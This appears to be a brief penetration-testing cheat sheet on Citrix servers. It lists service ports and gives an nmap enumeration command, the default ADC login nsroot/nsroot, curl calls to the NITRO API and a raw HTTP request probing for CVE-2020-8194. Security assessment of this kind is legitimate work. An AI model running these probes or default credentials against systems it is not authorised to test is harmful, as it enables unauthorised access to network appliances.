Citrix Servers - Ports
1604 - Citrix MetaFrame ICA
1494/tcp open citrix-ica Citrix Metaframe XP ICA - Citrix VDI (Virtual Delivery Agent)
2598/tcp open citriximaclient
#Below 4 are used in Load Balancers
3008/tcp open ssl/midnight-tech?
3009/tcp open ssl/mep Citrix NetScaler Metric Exchange Protocol
3010/tcp open gw? Citrix NetScaler Gateway
3011/tcp open mep Citrix NetScaler Metric Exchange Protocol
nmap -sS -sU --script citrix-enum-apps,citrix-enum-servers -i ips.txt -Pn -oA citrix
For Citrix ADC - Default Username/Password : nsroot/nsroot
Finding Citrix ADC Version
https://10.10.10.10/nitro/v1/config/nsversion
or
curl -X GET -H "Content-Type: application/json" -u nsroot:examplepassword http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nsversion
curl -X GET -H "Content-Type: application/json" -u <username>:<examplepassword> http://<Citrix-ADC-IP-address(NSIP)>/nitro/v1/config/nslicense
Testing Citrix ADC & Citrix Gateway for CVE-2020-8194
This vulnerability is present in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14, and 10.5-70.18.
Send a request as below and see if you can get any nitro errors
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: ht3yh6sQ
X-NITRO-PASS: q3d15maS
Content-Length: 46
<appfwprofile><login></login></appfwprofile>
POC script on github - One more
Comments
Post a Comment